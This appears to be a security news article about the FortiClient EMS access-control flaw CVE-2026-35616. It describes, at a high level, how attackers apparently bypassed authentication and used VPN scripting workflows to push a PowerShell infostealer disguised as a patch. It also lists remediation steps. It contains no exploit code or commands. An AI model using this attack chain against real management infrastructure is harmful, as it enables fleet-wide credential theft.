FortiClient EMS: EKZ Infostealer May Target VPN Management Channels
CVE-2026-35616 (CVSS 9.8): Compromised FortiClient EMS platforms could be transformed into malware delivery vehicles. Attacks in May 2026 may exploit native VP…
On May 28, 2026, reports documented a wave of attacks potentially exploiting CVE-2026-35616, a critical improper access control vulnerability in FortiClient EMS versions 7.4.5-7.4.6 with a CVSS score of up to 9.8. These exploits could potentially evolve beyond appliance compromise: they may transform the distributed management infrastructure into a delivery channel for EKZ Infostealer, potentially abusing native VPN scripting workflows to infect managed endpoints.
The vulnerability has been a reported threat since April. While Fortinet released hotfixes following reports of zero-day exploitation, and CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalog on April 6, 2026, attacks may have persisted through May. This ongoing campaign could expose an operational challenge: the platform built to secure the VPN perimeter may become a vehicle for compromise.
- CVE-2026-35616 is an improper access control vulnerability (CWE-284) in FortiClient EMS 7.4.5-7.4.6, carrying a CVSS score of 9.8 (Fortinet CNA) or 9.1 (CVE.org with temporal metrics E:F/RL:O/RC:C).
- May 2026 attacks may distribute EKZ Infostealer disguised as a Fortinet endpoint patch, potentially executed via PowerShell through EMS-managed VPN scripting workflows.
- EKZ Infostealer may export credentials from supported browsers to local log files. It may lack network-based exfiltration capabilities; theft could occur on-site, potentially for manual collection or retrieval via secondary channels.
- Compromising the EMS appliance could enable code execution on managed endpoints, potentially turning a single entry point into a distribution vector through native management features.
Exploit Mechanics: Potential Auth Bypass and Command Execution
The flaw resides in the processing of crafted HTTP requests sent to specific FortiClient EMS endpoints. The appliance may accept these requests as legitimate administrative actions even without valid credentials, potentially bypassing access controls. Once inside, attackers could interact with features that normally require administrative privileges.
The May 2026 campaign is characterized by its potential secondary phase. Attackers may have integrated the management infrastructure into the offensive chain. They could utilize VPN scripting workflows—native features designed to automate operations on VPN clients—to push PowerShell commands to endpoints. Reports noted that the execution pattern could resemble legitimate management operations, potentially neutralizing behavioral detection by using a trusted channel.
"The observed execution pattern suggests that threat actors used FortiClient's own management pathway to push malicious PowerShell commands to managed endpoints in a way that resembled legitimate management operations" — Arctic Wolf
The infostealer may be presented as a fake Fortinet endpoint update and executed via PowerShell. Once active, EKZ could harvest credentials from supported browsers and write them to local log files. The potential omission of network-based exfiltration suggests a modular design: the malware may focus on collection, potentially delegating data removal to subsequent stages or separate tools.
From March Zero-Day to Continuous Exploitation
Initial exploitation attempts were observed as early as March 31, 2026, as documented in reports dated April 6. Fortinet responded with hotfixes, and CISA included the CVE in the KEV catalog. During the same period, researchers identified nearly 2,000 FortiClient EMS instances potentially exposed to the public internet.
The surge in exploitation coincided with the Easter holiday weekend. Reports noted that attackers may move during holiday weekends. The operational advice indicated that applying the hotfix was a priority.
Findings suggest that the May 2026 attacks may reuse the same vulnerability, the same attack surface, and the same vulnerable endpoints. The issue may involve the failure to apply available patches.
Management Risks: When Security Platforms Are Targeted
The CVE-2026-35616 case illustrates a pattern where trusted control and distribution infrastructure could be weaponized. While the abuse of endpoint management tools is not unprecedented, the convergence of several factors makes this case significant.
First, the unauthenticated nature of the vulnerability could lower the barrier to entry. Second, the potential abuse of VPN scripting workflows exploits a channel that is typically excluded from behavioral monitoring. Third, masking the payload as a patch could exploit the trust endpoints place in their management system.
The operational impact could extend beyond a single compromised endpoint. Access to the EMS appliance could provide access to the managed fleet. In organizations with many VPN endpoints, compromising the central EMS could represent an enterprise-level escalation, potentially bypassing intermediate lateral movement phases.
Remediation and Response
- Verify the production version of FortiClient EMS: Vulnerable builds 7.4.5 and 7.4.6 should be updated to the hotfix released by Fortinet.
- Inspect active VPN scripting workflows on managed clients: Unauthorized scripts or anomalous PowerShell invocations through this channel could be indicators of compromise.
- Audit for EKZ Infostealer by searching for potential local log files that may contain exported browser credentials.
- Assess the public exposure of the EMS appliance: Organizations should ensure the vulnerable endpoint is not accessible to the open internet.
The Lesson of the Patching Gap
CISA assigned CVE-2026-35616 a short due date in the KEV catalog. This urgency reflected the severity: potential unauthenticated remote access, RCE, and confirmed exploitation. Yet, the May 2026 campaign demonstrates that even high-priority signals may not guarantee immediate operational action.
The gap between patch availability and deployment remains a significant challenge in enterprise defense. This may be a problem of operational friction and change management in environments where EMS handles critical remote access, potentially leading to risk assessments that favor uptime.
It remains unconfirmed whether the May 2026 attacks are attributable to the same threat actor responsible for the initial wave. Furthermore, it is unknown if CVE-2026-35616 and CVE-2026-21643—another FortiClient EMS vulnerability in the KEV involving SQL injection—were exploited in linked campaigns. Sources also do not specify if version 7.4.7, containing the permanent fix, has been officially released.
The next wave of attacks may find the same vulnerabilities still present.
Information has been verified against cited sources and is current as of the time of publication.
Sources
- https://www.securityweek.com/critical-forticlient-ems-vulnerability-exploited-in-fresh-attacks/
- https://securityaffairs.com/192817/malware/cve-2026-35616-forticlient-ems-flaw-actively-exploited-in-malware-attacks.html
- https://cyberscoop.com/fortinet-forticlient-ems-zero-day-cve-2026-35616-hotfix-known-exploited/
- https://nvd.nist.gov/vuln/detail/CVE-2026-35616
- https://www.cve.org/CVERecord?id=CVE-2026-35616
- https://nvd.nist.gov/vuln/detail/CVE-2026-21643
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- https://unit42.paloaltonetworks.com/fifa-world-cup-attack-surface/
- https://unit42.paloaltonetworks.com/captive-portal-zero-day/
- https://unit42.paloaltonetworks.com/cve-2026-31431-copy-fail/
- https://unit42.paloaltonetworks.com/autonomous-ai-cloud-attacks/